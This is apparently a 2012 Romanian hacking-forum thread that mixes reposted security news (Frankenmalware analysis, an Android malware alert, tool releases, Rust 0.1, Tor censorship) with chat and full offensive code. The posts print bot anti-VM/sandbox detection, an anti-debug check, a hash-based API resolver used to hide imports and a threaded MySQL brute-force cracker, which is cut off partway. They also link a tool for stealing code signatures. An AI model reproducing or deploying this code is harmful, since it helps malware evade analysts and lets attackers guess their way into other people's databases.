Nytro

[h=1]HTML in XMLHttpRequest[/h] The W3C XMLHttpRequest specification adds HTML parsing support to XMLHttpRequest, which originally supported only XML parsing. This feature allows Web apps to obtain an HTML resource as a parsed DOM using XMLHttpRequest. [h=3]Limitations[/h] To discourage the synchronous use of XMLHttpRequest, HTML support is not available in the synchronous mode. Also, HTML support is only available if the responseType property has been set to "document". This limitation avoids wasting time parsing HTML uselessly when legacy code uses XMLHttpRequest in the default mode to retrieve responseText for text/html resources. Also, this limitation avoids problems with legacy code that assumes that responseXML is null for HTTP error pages (which often have a text/html response body). [h=3]Usage[/h] Retrieving an HTML resource as a DOM using XMLHttpRequest works just like retrieving an XML resource as a DOM using XMLHttpRequest, except you can't use the synchronous mode and you have to explicitly request a document by assigning the string "document" to the responseType property of the XMLHttpRequest object after calling open() but before calling send(). var xhr = new XMLHttpRequest(); xhr.onload = function() { alert(this.responseXML.title); } xhr.open("GET", "file.html"); xhr.responseType = "document"; xhr.send(); [h=3]Feature Detection[/h] There are two challenges to detecting if a browser supports HTML parsing in XMLHttpRequest. First, the detection result is obtained asynchronously, because HTML support is only available in the asynchronous mode. Second, you have to actually fetch a test document over HTTP, because testing with a data: URL would end up testing data: URL support instead. Thus, to detect HTML support, a test HTML file is needed on the server. This test file is small and is not well-formed XML: <title>&&<</title> If the file is named detect.html, the following function can be used for detecting HTML parsing support: function detectHtmlInXhr(callback) { if (!window.XMLHttpRequest) { window.setTimeout(function() { callback(false); }, 0); return; } var done = false; var xhr = new window.XMLHttpRequest(); xhr.onreadystatechange = function() { if (this.readyState == 4 && !done) { done = true; callback(!!(this.responseXML && this.responseXML.title && this.responseXML.title == "&&<")); } } xhr.onabort = xhr.onerror = function() { if (!done) { done = true; callback(false); } } try { xhr.open("GET", "detect.html"); xhr.responseType = "document"; xhr.send(); } catch (e) { window.setTimeout(function() { if (!done) { done = true; callback(false); } }, 0); } } The argument callback is a function that will be called asynchronously with true as the only argument if HTML parsing is supported and false as the only argument if HTML parsing is not supported. [h=3]Character Encoding[/h] If the character encoding is declared in the HTTP Content-Type header, that character encoding is used. Failing that, if there is a byte order mark, the encoding indicated by the byte order mark is used. Failing that, if the is a meta tag that declares the encoding within the first 1024 bytes of the file, that encoding is used. Otherwise, the file is decoded as UTF-8. Sursa: https://developer.mozilla.org/en/HTML_in_XMLHttpRequest

UniOFuzz 0.1.2-beta - Universal fuzzing tool Released UniOFuzz version 0.1.2-beta - the universal fuzzing tool for browsers, web services, files, programs and network services/ports released by nullsecurity team. Video pigtail23, Developer of UniOFuzz demonstrated the tool in above Video. Download UniOFuzz Sursa: UniOFuzz 0.1.2-beta - Universal fuzzing tool Released | The Hacker News (THN)

[h=1]Virus infects worm by mistake[/h] 24 January 2012 New malware morphs into different shapes unattended by humans Ten years ago, there was a clear-cut distinction between Trojans, viruses and worms. They all had their own features specific to one family of malware only. As more people connected to the internet, cyber-criminals started mixing ingredients to maximize impact. And here I’m thinking Trojans with worm capabilities or viruses with Trojan features, and so on. Now, another “practice” has silently emerged: the file infector that accidentally parasites another e-threat. A virus infects executable files; and a worm is an executable file. If the virus reaches a PC already compromised by a worm, the virus will infect the exe files on that PC - including the worm. When the worm spreads, it will carry the virus with it. Although this happens unintentionally, the combined features from both pieces of malware will inflict a lot more damage than the creators of either piece of malware intended. While most file infectors have inbuilt spreading mechanisms, just like Trojans and worms (spreading routines for RDP, USB, P2P, chat applications, or social networks), some cannot replicate or spread between computers. And it seems a great idea to “outsource” the transportation mechanism to a different piece of malware (i.e. by piggybacking a worm). Most likely these Frankenmalware, or “malware sandwiches,” take place spontaneously. The virus actually infects by mistake another piece of malware and ends up using its capabilities to spread. Bitdefender’s Antimalware Lab identified no less than 40,000 such malware symbioses out of a sample pool of 10 million files. One such case is the Virtob file infector, whose malicious code has been found infecting worms like OnlineGames, the ancient Mydoom or the more advanced Bifrose backdoor Trojan. From the numerous samples of worms infected by viruses, we picked out the Win32.Worm.Rimecud -Win32.Virtob pair. A few words about Win32.Worm.Rimecud Win32.Worm.Rimecud is your typical worm with a state-of-the-art spreading apparatus. For propagation it uses file-sharing applications (Ares P2P, BearShare, iMesh, Shareaza. Kazaa, DC++, eMule, LimeWire), USB devices, Microsoft MSN Messenger (sends all contacts links to sites that host malware) and network drives mapped locally. Once on the system, Rimecud injects its code into explorer.exe and steals passwords pertaining to e-banking, on-line shopping, social networking or e-mail accounts from Mozilla Firefox and Internet Explorer. In the meantime its backdoor component enables it to connect to the C&C servers and fetch commands such as flood, download and execute further malware on the compromised PC. On top of that, the worm looks for a VNC server (remote control software) that would allow the attacker remote access and control of the compromised PC. And certain details about Win32.Virtob Bitdefender labs have recently seen attached a file infector to the above mentioned worm - Win32.Virtob. This virus is known to infect executable files with .exe or .scr extensions by affixing a piece of malicious code to those files. The worm is an executable file, so chances are it also gets infected by the virus if it’s on the same computer. Virtob then instructs the compromised executable files to firstly run the viral code (by changing the entry point) and only afterwards gives control back to the original file. Certainly this also applies to the worm - its code will be executed only after the virus code has been launched. When its code is successfully loaded into the memory, Virtob connects to two IRC servers that are in fact C&C servers, and with the help of its backdoor component, the virus is ready to receive commands from a remote attacker via the Internet. By injecting its code into winlogon.exe and then adding this process to the firewall exception list, the virus makes sure it is granted complete Internet access and ensures its persistence – Winlogon is a critical process that, if terminated, will crash the computer. Afterwards, it infects HTML, HTM, PHP, ASP files by injecting IFrames that might silently load content from malware-laden pages. Now, imagine these two pieces of malware working together - willingly or not - from and on the same compromised system. That PC faces a twofold malware with twice as many command and control servers to query for instructions; moreover, there are two backdoors open, two attack techniques active and various spreading methods put in place. Where one fails, the other succeeds. Multiple Frankenware infections possible: If, by utter bad luck, the computer has more than one worm that applies to the virus specifications, the virus could infect more than one worm on the system. However, the virus might as well only infect the executable files in certain system locations, or of a certain length. Other viruses look for certain strings that pertain to other pieces of malware which will remain uninfected if found on the compromised system. So, one worm can be infected while others on the same system are not. If one of the two (whether the virus or the worm) is caught by the AV, the other might pass undetected. Perhaps if we think of an infected file (possibly the virus) that needs to be analyzed separately and a piece of code is taken out and looked at, maybe then someone discovers also the worm. If the worm is detected based on a signature, the worm is simply wiped out from the compromised system, without any further analysis. This would make it easier for the virus to pass unseen. There’s no rule. And two hypothetical scenarios: Hypothetical scenario No. 1: Imagine a worm like Downadup, that has been spreading constantly around the world for three years now (70,000 infected systems in the last six months alone), being infected with a virus. On the one hand, Downadup prevents the system from updating the OS and the AV solution locally installed; and on the other hand the virus may have rootkit capabilities and open a backdoor. Downadup spreads around the world constantly, which makes it a great propagation tool; not to mention that it took AVs more than half a year, and almost a million infections, to discover it. If this had carried along a virus, all those users would have suffered greater damage. And disinfection would be more complicated. Hypothetical scenario No. 2: Imagine that a worm is infected by a file infector (virus). And an AV detects the file infector first and tries to disinfect the files, which include the worm. In some rare cases disinfecting compromised files leaves behind clean files that are at the same time altered (not identical to the original anymore). They maintain their functionality but are slightly different in form. As most files are detected according to signatures and not based on their behavior (heuristically), an altered worm (disinfected along with other files that have been compromised by a file infector and disinfected by an antivirus) may not be caught anymore by the signature applied to the original file (that had been modified after disinfection). Disinfection might this way lead to a mutation that can actually help the worm. This article is based on the technical information provided courtesy of Doina Cosovan & R?zvan Benchea, Bitdefender VirusAnalysts. All product and company names mentioned herein are for identification purposes only and are the property of, and may be trademarks of, their respective owners. Sursa: Virus infects worm by mistake - MalwareCity : Computer Security Blog

[h=1]Android.Counterclank Found in Official Android Market[/h]by Irfan Asrar Symantec has identified multiple publisher IDs on the Android Market that are being used to push out Android.Counterclank. This is a minor modification of Android.Tonclank, a bot-like threat that can receive commands to carry out certain actions, as well as steal information from the device. For each of these malicious applications, the malicious code has been grafted on to the main application in a package called “apperhand”. When the package is executed, a service with the same name may be seen running on a compromised device. Another sign of an infection is the presence of the Search icon above on the home screen. The combined download figures of all the malicious apps indicate that Android.Counterclank has the highest distribution of any malware identified so far this year. [TABLE=width: 450] [TR=bgcolor: #CCCCCC] [TD=width: 100]Publisher[/TD] [TD=width: 200]Malicious App Title[/TD] [TD=width: 132]Category[/TD] [/TR] [TR] [TD]iApps7 Inc[/TD] [TD]Counter Elite Force[/TD] [TD]Arcade & Action[/TD] [/TR] [TR] [TD]iApps7 Inc[/TD] [TD]Counter Strike Ground Force[/TD] [TD]Arcade & Action[/TD] [/TR] [TR] [TD]iApps7 Inc[/TD] [TD]CounterStrike Hit Enemy[/TD] [TD]Arcade & Action[/TD] [/TR] [TR] [TD]iApps7 Inc[/TD] [TD]Heart Live Wallpaper[/TD] [TD]Entertainment[/TD] [/TR] [TR] [TD]iApps7 Inc[/TD] [TD]Hit Counter Terrorist[/TD] [TD]Arcade & Action[/TD] [/TR] [TR] [TD]iApps7 Inc[/TD] [TD]Stripper Touch girl[/TD] [TD]Entertainment[/TD] [/TR] [TR] [TD]Ogre Games[/TD] [TD]Balloon Game[/TD] [TD]Sports Games[/TD] [/TR] [TR] [TD]Ogre Games[/TD] [TD]Deal & Be Millionaire[/TD] [TD]Sports Games[/TD] [/TR] [TR] [TD]Ogre Games[/TD] [TD]Wild Man[/TD] [TD]Arcade & Action[/TD] [/TR] [TR] [TD]redmicapps[/TD] [TD]Pretty women lingerie puzzle[/TD] [TD]Photography[/TD] [/TR] [TR] [TD]redmicapps[/TD] [TD]Sexy Girls Photo Game[/TD] [TD]Lifestyle[/TD] [/TR] [TR] [TD]redmicapps[/TD] [TD]Sexy Girls Puzzle[/TD] [TD]Brain & Puzzle[/TD] [/TR] [TR] [TD]redmicapps[/TD] [TD]Sexy Women Puzzle[/TD] [TD]Brain & Puzzle[/TD] [/TR] [/TABLE] Symantec is continuing with further investigation and we will post more information as we discover it. Sursa: Android.Counterclank Found in Official Android Market | Communauté Symantec Connect

Acunetix Web Vulnerability Scanner By MaxiSoler on 28 January 2012 in Tools with No Comments Acunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits your web applications by checking for exploitable hacking vulnerabilities. Automated scans may be supplemented and cross-checked with the variety of manual tools to allow for comprehensive web site and web application penetration testing. Improvements: The accuracy of Script Checks has been increased. The Acunetix development team is dedicated to continuously improve scan detection of security checks. The Graphical User Interface (GUI) has been enhanced in order to make menu navigation and usage easier and more effective than ever before. SSL security audit script is launched automatically when scanning a HTTPS website, regardless if port scanning is enabled or not. Added a number of new SQL Injection variants checks. Bug Fixes: HPP detection security script failed when testing input scheme with excluded variants Apply settings button not showing up in specific cases Fixed several issues related to pausing and resuming of crawler Fixed several issues when running multiple instances of the reporter Two backup files were being generated because of filename case insensitivity Filtering of wildcards from robots.txt This release candidate of Acunetix Web Vulnerability Scanner Version 8 is considered complete, stable, and suitable for testing. More Information: Acunetix v8 Manual Download Acunetix Web Vulnerability Scanner v8 RC Sursa: IT Vulnerability & ToolsWatch | Acunetix Web Vulnerability Scanner v8 Released Candidate Released

[h=2]Mozilla releases Rust 0.1, the language that will eventually usurp Firefox’s C++[/h]By Sebastian Anthony on January 24, 2012 at 6:52 am After more than five years in the pipeline, Mozilla Labs and the Rust community have released the first alpha — version 0.1 — of the Rust programming language compiler. The Rust language emphasizes concurrency and memory safety, and — if everything goes to plan — is ultimately being groomed to replace C++ as Mozilla’s compiled language of choice. Browser prototypes programmed in Rust will eventually emerge, and then one day Firefox — or parts of Firefox — might be re-written in Rust. A bit more about the language itself: Rust is a compiled, statically-typed, object-oriented programming language (and objects are immutable by default). The compiler is supported on Windows, Linux, and Mac. Feature-wise, Rust intentionally avoids any novel ideas, and instead builds upon existing, known features that are present in other languages. Syntax-wise, Rust uses curly braces {} like C, C++, or JavaScript, but as you can see in the code block below, the syntax is actually quite funky. [INDENT]use std; fn main(args: [str]) { std::io::println("hello world from '" + args[0] + "'!"); } [/INDENT] At this point we have to compare Rust to Go, Google’s new language. The Rust community explicitly says that it was not inspired by Go — development of Rust began before Go — but that other languages made by Rob Pike such as Newsqueak, Alef, and Limbo were influential. Feature-wise, the languages are quite similar, but Rust seems to be more security- and safety-oriented. Where Go has global garbage collection, null pointers, and shared mutable states, Rust GC is optional and per-task, null pointers are not allowed, and objects are immutable by default. As far as the state of the language is concerned, most of its features work but are incomplete. Standard library APIs are subject to change. Performance isn’t yet up to scratch (eventually it should be as fast as C++). In other words, you can dive in and play with Rust, but future versions of the compiler will break your code. To get started, hit up the Rust language website — or read the Rust 0.1 release notes Sursa: Mozilla releases Rust 0.1, the language that will eventually usurp Firefox’s C++ | ExtremeTech

MediaFire: "Suntem o companie americana si respectam legile americane". (ceva de genul) O sa continue sa ofere servicii de hosting.

La munca, nu la intins mana. Fara astfel de rahaturi aici, o sa ramaneti intreaga viata niste hoti. Sper sa putreziti in puscarie. Ban permanent.

Ah, stiam ca a mai fost postat, dar credeam ca versiunea in limba germana, de aceea am postat.

Vedeti asta: [h=1]Linux Local Privilege Escalation via SUID /proc/pid/mem Write[/h]

Tot pe aceasta ramura: [h=2]Anti-Debug trick[/h] defs.h NtCreateEventPair( OUT PHANDLE IN ACCESS_MASK IN POBJECT_ATTRIBUTES EventPairHandle, DesiredAccess, ObjectAttributes OPTIONAL ); typedef struct _DEBUG_EVENT { LIST_ENTRY EventList; KEVENT ContinueEvent; CLIENT_ID ClientId; PEPROCESS Process; PETHREAD Thread; NTSTATUS Status; ULONG Flags; PETHREAD BackoutThread; DBGKM_MSG ApiMsg; } DEBUG_EVENT, *PDEBUG_EVENT; typedef struct _DBGKM_MSG { PORT_MESSAGE h; DBGKM_APINUMBER ApiNumber; ULONG ReturnedStatus; union { DBGKM_EXCEPTION Exception; DBGKM_CREATE_THREAD CreateThread; DBGKM_CREATE_PROCESS CreateProcess; DBGKM_EXIT_THREAD ExitThread; DBGKM_EXIT_PROCESS ExitProcess; DBGKM_LOAD_DLL LoadDll; DBGKM_UNLOAD_DLL UnloadDll; }; } DBGKM_MSG, *PDBGKM_MSG; detect.c #define WIN32_LEAN_AND_MEAN #include <stdio.h> #include <stdlib.h> #include <windows.h> #include "defs.h" #pragma comment(lib,"ntdll.lib") #pragma comment(lib,"psapi.lib") void QueryProcessHeapMethod(void) { PDEBUG_BUFFER buffer; buffer = RtlCreateQueryDebugBuffer(0,FALSE); RtlQueryProcessHeapInformation(buffer); if (buffer->RemoteSectionBase == (PVOID) 0x50000062) MessageBoxA(NULL,"Debugged","Warning",MB_OK); else MessageBoxA(NULL,"Not Debugged","Warning",MB_OK); if (buffer->EventPairHandle == (PVOID) 0x00002b98) MessageBoxA(NULL,"Debugged","Warning",MB_OK); else MessageBoxA(NULL,"Not Debugged","Warning",MB_OK); printf("EventPairHandle= %x",(int)buffer->EventPairHandle); } int main() { QueryProcessHeapMethod(); } Sursa (cu alte informatii utile): Anti-Debug trick

In sfarsit cineva care posteaza lucruri extrem de utile si de interesante. Desigur, pentru ce interesati.

[h=1][C#] Digitally Sign App & Steal Signature[/h]This is a quick draft of stealing a signature from a signed app, and signing your own app w/ the signature. Author: Exidous Download (x86 si x64): http://www.hackhound.org/forum/index.php?app=core&module=attach&section=attach&attach_id=12100 http://www.hackhound.org/forum/index.php?app=core&module=attach&section=attach&attach_id=12110 Va faceti si voi cont: http://www.hackhound.org/forum/topic/42544-c-digitally-sign-app-steal-signature/

[h=1][C++] Anti-VMWare[/h]Author: _Carb0n_ #include "../Headers/includes.h" #include "../Headers/functions.h" #ifndef NO_ANTIVM DWORD __forceinline IsInsideVPC_exceptionFilter(LPEXCEPTION_POINTERS ep) { PCONTEXT ctx = ep->ContextRecord; ctx->Ebx = -1; // Not running VPC ctx->Eip += 4; // skip past the "call VPC" opcodes return EXCEPTION_CONTINUE_EXECUTION; } bool DetectVPC() { bool bVPCIsPresent = FALSE; __try { _asm push ebx _asm mov ebx, 0 // It will stay ZERO if VPC is running _asm mov eax, 1 // VPC function number _asm __emit 0Fh _asm __emit 3Fh _asm __emit 07h _asm __emit 0Bh _asm test ebx, ebx _asm setz [bVPCIsPresent] _asm pop ebx } __except(IsInsideVPC_exceptionFilter(GetExceptionInformation())) { } #ifdef DEBUG if (bVPCIsPresent==TRUE) DebugMsg("Bot is under VPC !"); else DebugMsg("Bot is not running under VPC !"); #endif return bVPCIsPresent; } bool DetectVMWare() { bool bVMWareIsPresent = TRUE; __try { __asm { push edx push ecx push ebx mov eax, 'VMXh' mov ebx, 0 // any value but not the MAGIC VALUE mov ecx, 10 // get VMWare version mov edx, 'VX' // port number in eax, dx // read port // on return EAX returns the VERSION cmp ebx, 'VMXh' // is it a reply from VMWare? setz [bVMWareIsPresent] // set return value pop ebx pop ecx pop edx } } __except(EXCEPTION_EXECUTE_HANDLER) { bVMWareIsPresent = FALSE; } #ifdef DEBUG if (bVMWareIsPresent==TRUE) DebugMsg("Bot is under VMWare !"); else DebugMsg("Bot is not running under VMWare !"); #endif return bVMWareIsPresent; } bool DetectAnubis() { char szBotFile[MAX_PATH]; bool bAnubisIsPresent = FALSE; if (strstr(szBotFile, "C:InsideTm")) bAnubisIsPresent = TRUE; #ifdef DEBUG if (bAnubisIsPresent==TRUE) DebugMsg("Bot is running under Anubis !"); else DebugMsg("Bot is not running under Anubis !"); #endif return bAnubisIsPresent; } bool IsProcessRunningUnderVM() { bool bVMWare; bool bVPC; bool bAnubis; bVMWare = DetectVMWare(); bVPC = DetectVPC(); bAnubis = DetectAnubis(); if (bVPC==TRUE || bVMWare==TRUE || bAnubis==TRUE) return TRUE; return FALSE; } #endif Sursa: http://www.hackhound.org/forum/topic/893-c-anti-vmware/

[C] Dynamic API calling Author: /* Calling Windows API without using any API. 32bit version. Tested on Win7 x64. by January, 2012. This is how I've been doing my API calling for years. I believe I first started doing it with the Ju u stealer. Using an array of function pointers and an array of hashes for each library, I find it much easier to gather all of the necessary API pointers than doing 1 function call for each API I want to use. Or doing a function call every time I want to use an API. get_k32base() has been changed from what it used to be because I found it was no longer working on my win7. I do not guarantee it's effectiveness on other OS's. #trinity OG production. Fuck your crew. */ #include <windows.h> //I didn't have the header for these two structs so that's why they're here... typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef struct _LDR_MODULE { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID BaseAddress; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; SHORT LoadCount; SHORT TlsIndex; LIST_ENTRY HashTableEntry; ULONG TimeDateStamp; } LDR_MODULE, *PLDR_MODULE; //definitions for API we are importing. typedef HMODULE (WINAPI *LoadLibraryW_)(LPCWSTR lpLibFileName); typedef int (WINAPI *MessageBoxW_)(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType); typedef int (WINAPI *MessageBoxA_)(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType); //hashes for API we are importing. #define dwLoadLibraryW 0x5FBFF111 #define dwMessageBoxW 0x384F14CA #define dwMessageBoxA 0x384F14B4 //function pointers for API we are importing. static LoadLibraryW_ LLW; static MessageBoxW_ MBW; static MessageBoxA_ MBA; //Arrays for API we are importing. //Must have a corresponding array of hashes and addresses function pointers for each library. //Kernel32 //Yes, I know it's dumb to have an array of 1 element...but that's just how the function works. //This could be redone so that you don't need the Kernel32Hashes array but it's in here for uniformity. static const DWORD Kernel32Hashes[] = { dwLoadLibraryW }; static LPVOID* Kernel32Ptrs[] = { (LPVOID*)&LLW }; //User32 //MessageBoxW AND MessageBoxA?!? Yeah... I didn't have any better ideas for a simple example. static const DWORD User32Hashes[] = { dwMessageBoxW, dwMessageBoxA }; static LPVOID* User32Ptrs[] = { (LPVOID*)&MBW, (LPVOID*)&MBA }; //code.. int _lstrcmpW_(LPCWSTR str1, LPCWSTR str2) /* lstrcmpW replacement function so that there is no unnecessary imports in the IAT. this doesn't behave exactly as lstrcmpW but I don't need it to I just needed it to tell if two strings are the same, I don't care what the numerical difference is. It would be advisable to turn this into something that compares the hash of the two strings but its whatevs. inputs: two null terminated, wide character strings. outputs: 0 if strings are the same, else -1. */ { if (*str1 == 0 || *str2 == 0) return -1; while (*str1 && *str2) { if (*str1 != *str2) return -1; str1++; str2++; } if (*str1 || *str2) return -1; return 0; } DWORD DJBHash(LPCSTR str) /* not by me. old, simple hashing function, don't know the real author. modified to specifically hash null terminated ASCII strings. inputs: null terminated string. outputs: 32-bit hash of input null terminated string. */ { DWORD hash = 5381; for(; *str; str++) { hash = ((hash << 5) + hash) + (*str); } return hash; } LPVOID GetAPI_FROM_DJB(const LPVOID library, const DWORD APIHASH) /* GetProcAddress replacement. Uses hashes of api names instead of strings. inputs: library = handle or base address to library (DLL) currently loaded in memory. APIHASH = hash of API name we are searching for. outputs: on success: pointer to library function that can be called from a function pointer. on error: NULL. */ { PIMAGE_EXPORT_DIRECTORY lExport; DWORD x; if (library) { lExport = (PIMAGE_EXPORT_DIRECTORY)((DWORD)library + ((PIMAGE_NT_HEADERS)((DWORD)library + ((PIMAGE_DOS_HEADER)library)->e_lfanew))->OptionalHeader.DataDirectory[0].VirtualAddress); DWORD *Names = (DWORD*)((DWORD)library + lExport->AddressOfNames); WORD *Ordinals = (WORD*)((DWORD)library + lExport->AddressOfNameOrdinals); DWORD *Functions = (DWORD*)((DWORD)library + lExport->AddressOfFunctions); for (x = 0; x < lExport->NumberOfNames; x++) { if (DJBHash((char*)(Names[x] + (DWORD)library)) == APIHASH) return (LPVOID)(Functions[Ordinals[x]] + (DWORD)library); } } return NULL; } LPVOID get_k32base() /* The assembly code is not mine, just modified from an old source by drn. I believe it was originally by Vecna or somebody. inputs: none, obviously. outputs: base address of kernel32.dll (if you are using windows2000 this will fail if kernel32 is not already linked in the import table, due to bug in win2k.) */ { LPVOID k32base = NULL; PLDR_MODULE lm, lol; __asm { pushad xor eax, eax mov eax, fs:[eax+30h] mov eax, [eax+0ch] mov esi, [eax+0ch] lodsd mov [lm], eax popad } lol = lm; while (true) { if (!lm->BaseDllName.Buffer) break; if (_lstrcmpW_(L"kernel32.dll", lm->BaseDllName.Buffer) == 0) { k32base = lm->BaseAddress; break; } lm = (PLDR_MODULE)lm->InLoadOrderModuleList.Flink; if (lm == lol || !lm) //don't wanna loop infinitely if user is on win2k or some future Windows that doesn't explicitly link kernel32. break; } return k32base; } void fillAPIPtrs(const LPVOID DllBase, const DWORD dwNumFuncs, const DWORD *HashArray, LPVOID **PtrArray) /* Will fill an array of pointers to API from within a given library. inputs: DllBase: Base address of library we are searching. dwNumFuncs: Number of members in HashArray and PtrArray. Basically the number of API we are searching for in the library. HashArray: Array of DWORDS that are corresponding hashes for pointers to be filled in PtrArray. Must be same size as PtrArray. PtrArray: Array of function pointers to be filled. Must be same size as HashArray. outputs: none, fills PtrArray with (hopefully) valid pointers to desired API. */ { DWORD i; for (i = 0; i < dwNumFuncs; i++) *PtrArray[i] = GetAPI_FROM_DJB(DllBase, HashArray[i]); } int main() { LPVOID k32; LPVOID user32; k32 = get_k32base(); fillAPIPtrs(k32, sizeof(Kernel32Hashes) / sizeof(DWORD), Kernel32Hashes, Kernel32Ptrs); if (LLW) { user32 = LLW(L"user32"); if (user32) { fillAPIPtrs(user32, sizeof(User32Hashes) / sizeof(DWORD), User32Hashes, User32Ptrs); if (MBW && MBA) { if (MBW(NULL, L":D", L"Hello World!", MB_YESNO) == IDYES) MBA(NULL, "Party All the Time", "\\o/", MB_OK); else MBA(NULL, "y u gay?", "D:", MB_OK); } } } return 0; } Sursa: http://www.hackhound.org/forum/topic/43503-dynamic-api-calling/

[h=1]28C3: How governments have tried to block Tor (en)[/h] For more information visit: 28C3: speakers To download the video visit: Documentation - 28C3 public wiki Playlist 28C3: 28C3: Behind Enemy Lines - YouTube Speakers: Jacob Appelbaum | Roger Dingledine Iran blocked Tor handshakes using Deep Packet Inspection (DPI) in January 2011 and September 2011. Bluecoat tested out a Tor handshake filter in Syria in June 2011. China has been harvesting and blocking IP addresses for both public Tor relays and private Tor bridges for years. Roger Dingledine and Jacob Appelbaum will talk about how exactly these governments are doing the blocking, both in terms of what signatures they filter in Tor (and how we've gotten around the blocking in each case), and what technologies they use to deploy the filters -- including the use of Western technology to operate the surveillance and censorship infrastructure in Tunisia (Smartfilter), Syria (Bluecoat), and other countries. We'll cover what we've learned about the mindset of the censor operators (who in many cases don't want to block Tor because they use it!), and how we can measure and track the wide-scale censorship in these countries. Last, we'll explain Tor's development plans to get ahead of the address harvesting and handshake DPI arms races. Link: Tocmai l-am vazut, e ceva ce trebuie vazut, ce s-a intamplat in Iran, China, Siria, Tunisia, Egipt se poate intampla si la noi, si e bine sa stim ce se intampla, ce se poate face pentru monitorizarea traficului.

Ai nevoie de host? Nu ai bani din chestiile private si unice si smechere pe care le ai, probabil gasite de tine? Sa fim seriosi, e o porcarie ideea.

Hackerii care stiu sa descarce LOIC si sa dea un click. Profesionisti.

E scanf, citeste. Returneaza 0 in caz de eroare, ceea ce probabil se intampla si aici, sau numarul de chestii citite. Aici, citeste "%d" + 2. Acel "%d" e in memorie % d NULL, deci practic e un: scanf(NULL); adica returneaza 0. Oricum nu e afisat nimic, dar asa functioneaza.

"dfsdfdsf" - sir de caractere, pointer la sir de caractere terminat in NULL "%d" - idem mai sus "%d" + 2 - idem mai sus, +2 la adresa pointerului

Ai incercat pe o versiune mai veche de kernel? Kernelul are suport pentru "promiscuous mode"? Poate IOCTL-ul SIOCSIFFLAGS nu e folosit cum trebuie, poate au fost facute modificari pe versiunile mai noi de kernel, desi nu cred... Am citit putin, si pare ceva legat de modul in care se seteaza placa de retea in "promiscuous mode", fie cu ifconfig, fie programabil, cu acest IOCTL, dar nu am timp acum sa citesc si nu cred ca as gasi ceva concret.

Da, dragut, speram sa aflu cate ceva despre exploit-ul in sine. Am citit "povestea" unui stack overflow intr-un alt tip de fisier, tot in VLC, si e extrem de interesant, cum a fost gasit acel stack overflow si cum s-a putut exploata. Si nu e deloc simplu. Oricum, VLC are un parser pentru formatele de fisiere, si cred ca ar trebui sa mearga pentru orice extensie a acelui fisier. De asemenea, VLC parca avea si un plugin pentru Mozilla, oare se va executa payload-ul daca acel fisier e pus intr-un HTML sa fie vizualizat in browser?

Sincer, nu m-a impresionat nimic.

MySQL Brute Force Tool Authored by James Stevenson | Site stev.org Posted Jan 19, 2012 This is a small MySQL cracking tool capable of running login attempts from multiple threads in parallel. It is capable of 1024 concurrent connections. /* * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Library General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * $Id: brute-mysql.c,v 1.1 2012/01/19 22:32:19 james.stevenson Exp $ * * Author: * NAME: James Stevenson * WWW: http://www.stev.org * */ #include <stdio.h> #include <stdlib.h> #include <stdarg.h> #include <getopt.h> #include <string.h> #include <pthread.h> #include <mysql/mysql.h> int verbose = 0; int total = 0; volatile int quit = 0; pthread_mutex_t mutex_pass = PTHREAD_MUTEX_INITIALIZER; struct args { char *host; char *db; int port; }; void print_help(FILE *fp, char *app) { fprintf(fp, "Usage: %s [<options>]\n", app); fprintf(fp, "\n"); fprintf(fp, " -h Print this help and exit\n"); fprintf(fp, " -v Verbose. Repeat for more info\n"); fprintf(fp, " -t <host> host to try\n"); fprintf(fp, " -p <port> port to connect on\n"); fprintf(fp, " -n <num> number of threads to use\n"); fprintf(fp, "\n"); fprintf(fp, "Note: usernames / password will be read from stdin\n"); fprintf(fp, "The format for this is username:password\n"); fprintf(fp, "\n"); } int try(char *hostname, char *username, char *password, char *db, int port) { MYSQL mysql; mysql_init(&mysql); if (!mysql_real_connect(&mysql, hostname, username, password, db, port, NULL, 0)) { switch(mysql_errno(&mysql)) { case 1045: /* ER_ACCESS_DENIED_ERROR */ if (verbose >= 1) printf("Failed: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql)); break; default: printf("Unknown Error: %d -> %s\n", mysql_errno(&mysql), mysql_error(&mysql)); break; } return 0; } if (verbose >= 1) printf("Success: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql)); mysql_close(&mysql); return 1; } int getpassword(char **buf, size_t *buflen, char **username, char **password) { pthread_mutex_lock(&mutex_pass); if (getline(buf, buflen, stdin) >= 0) { pthread_mutex_unlock(&mutex_pass); char *tmp = strchr(*buf, ':'); if (tmp == 0 || tmp[1] == 0) return 0; *username = *buf; *tmp = 0; tmp++; *password = tmp; tmp = strchr(*password, '\n'); if (tmp != 0) *tmp = 0; if (verbose >= 2) printf("username: %s password: %s\n", *username, *password); return 1; } pthread_mutex_unlock(&mutex_pass); return 0; } void *run(void *p) { struct args *a = (struct args *) p; char *buf = 0; size_t buflen = 0; char *user = 0; char *pass = 0; while(quit == 0) { if (getpassword(&buf, &buflen, &user, &pass) == 0) goto free; /* we ran out of passwords */ if (try(a->host, user, pass, a->db, a->port)) { printf("Success! Username: %s Password: %s\n", user, pass); quit = 1; goto free; } } free: if (buf != NULL) free(buf); pthread_exit(NULL); return NULL; } int main(int argc, char **argv) { struct args args; pthread_t *thd; pthread_attr_t attr; int nthreads = 1; int i = 0; int c; memset(&args, 0, sizeof(args)); while( (c = getopt(argc, argv, "d:hn:p:t:v")) != -1) { switch(c) { case 'd': args.db = optarg; break; case 'h': print_help(stdout, argv[0]); exit(EXIT_SUCCESS); break; case 'n': nthreads = atoi(optarg); break; case 't': args.host = optarg; break; case 'v': verbose++; break; case 'p': args.port = atoi(optarg); break; } } if (args.db == NULL) args.db = 